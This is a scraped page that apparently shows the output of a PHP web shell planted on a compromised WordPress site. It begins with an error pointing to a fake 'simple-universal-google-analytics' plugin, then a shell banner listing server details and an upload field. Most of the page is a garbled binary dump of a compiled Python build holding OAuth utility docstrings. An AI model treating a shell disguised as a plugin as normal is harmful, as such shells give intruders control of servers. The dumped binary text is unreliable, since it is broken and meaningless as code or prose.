Warning: chmod(): Operation not permitted in /var/www/hopeinstoughton_www/wp-content/plugins/simple-universal-google-analytics/main.php on line 8 [0] in function chmod in /var/www/hopeinstoughton_www/wp-content/plugins/simple-universal-google-analytics/main.php on line 8 [1] in function include_once in /var/www/hopeinstoughton_www/wp-settings.php on line 560 [2] in function require_once in /var/www/hopeinstoughton_www/wp-config.php on line 85 [3] in function require_once in /var/www/hopeinstoughton_www/wp-load.php on line 50 [4] in function require_once in /var/www/hopeinstoughton_www/wp-blog-header.php on line 13 [5] in function require in /var/www/hopeinstoughton_www/index.php on line 17
| Server IP : 94.177.8.99 / Your IP : 216.73.217.165 Web Server : Apache/2.4.58 (Ubuntu) System : Linux aries 6.8.0-134-generic #134-Ubuntu SMP PREEMPT_DYNAMIC Fri Jun 26 18:43:11 UTC 2026 x86_64 User : www-data ( 33) PHP Version : 8.1.34 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : OFF Directory : /nuitka/eggshell.build/ |
Upload File : |
�� �unicode_type�.��
�encode�.�� �utf-8���.��
�_quote�.��
�decode�.�� �_unquote�.�� �encode_params_utf8�.�� �
_urlencode�.��* �&too many values to unpack (expected 2)�.�� �encoded�.��
�append�.��m �iEnsures that all parameters in a list of 2-element tuples are encoded to
bytestrings using UTF-8
�.�� �decoded�.��j �fEnsures that all parameters in a list of 2-element tuples are decoded to
unicode using UTF-8.
�.�� �
urlencoded�.��� ��Error trying to decode a non urlencoded string. Found invalid characters: %s in the string: '%s'. Please ensure the request/response body is x-www-form-urlencoded.�.�� �query�.�� �INVALID_HEX_PATTERN�.��
�search�.��) �%Invalid hex encoding in query string.�.�� �PY3�.�� �urlparse�.��
� parse_qsl�.�� }��keep_blank_values��s.�� �decode_params_utf8�.��� X� Decode a query string in x-www-form-urlencoded format into a sequence
of two-element tuples.
Unlike urlparse.parse_qsl(..., strict_parsing=True) urldecode will enforce
correct formatting of the query string by validation. If validation fails
a ValueError will be raised. urllib.parse_qsl will only raise errors if
any of name-value pairs omits the equals sign.
�.��
� urldecode�.�� �__iter__�.�� �items�.��
�params�.��1 X* Extract parameters and return them as a list of 2-tuples.
Will successfully extract parameters from urlencoded query strings,
dicts, or lists of 2-tuples. Empty strings/dicts/lists will return an
empty list of parameters. Any other input will result in a return
value of None.
�.�� �randbits�.�� K@��.�� �generate_timestamp�.��� X� Generate pseudorandom nonce that is unlikely to repeat.
Per `section 3.3`_ of the OAuth 1 RFC 5849 spec.
Per `section 3.2.1`_ of the MAC Access Authentication spec.
A random 64-bit number is appended to the epoch timestamp for both
randomness and to decrease the likelihood of collisions.
.. _`section 3.2.1`: https://tools.ietf.org/html/draft-ietf-oauth-v2-http-mac-01#section-3.2.1
.. _`section 3.3`: https://tools.ietf.org/html/rfc5849#section-3.3
�.�� �time�.��K XD Get seconds since epoch (UTC).
Per `section 3.3`_ of the OAuth 1 RFC 5849 spec.
Per `section 3.2.1`_ of the MAC Access Authentication spec.
.. _`section 3.2.1`: https://tools.ietf.org/html/draft-ietf-oauth-v2-http-mac-01#section-3.2.1
.. _`section 3.3`: https://tools.ietf.org/html/rfc5849#section-3.3
�.�� �SystemRandom�.�� � �.��_ XX Generates a non-guessable OAuth token
OAuth (1 and 2) does not specify the format of tokens except that they
should be strings of random characters. Tokens should not be guessable
and entropy when generating the random characters is important. Which is
why SystemRandom is used instead of the default random.choice method.
�.�� �rand�.��
�choice�.�� �chars�.��
� <genexpr>�.��% �!generate_token.<locals>.<genexpr>�.�� �jwt�.�K .�� �datetime�.��
�utcnow�.�� �scope�.�� �exp�.��
� timedelta�.�� �
expires_in�.��
�seconds���.��
�claims�.�� �RS256�.�� �
to_unicode�.�� �UTF-8�.�� }��
algorithms�]��RS256�as.�� �generate_token�.��� ��Generates an OAuth client_id
OAuth 2 specify the format of client_id in
https://tools.ietf.org/html/rfc6749#appendix-A.
�.��
�extend�.��
� urlencode�.��- �)Extend a query with a list of two-tuples.�.��* �&too many values to unpack (expected 6)�.�� �add_params_to_qs�.�� �
urlunparse�.��9 �5Add a list of two-tuples to the uri query components.�.��
�result�.�� X Near-constant time string comparison.
Used in order to avoid timing attacks on sensitive information such
as secret keys during request verification (`rootLabs`_).
.. _`rootLabs`: http://rdist.root.org/2010/01/07/timing-independent-array-comparison/
�.�� �encoding���.��>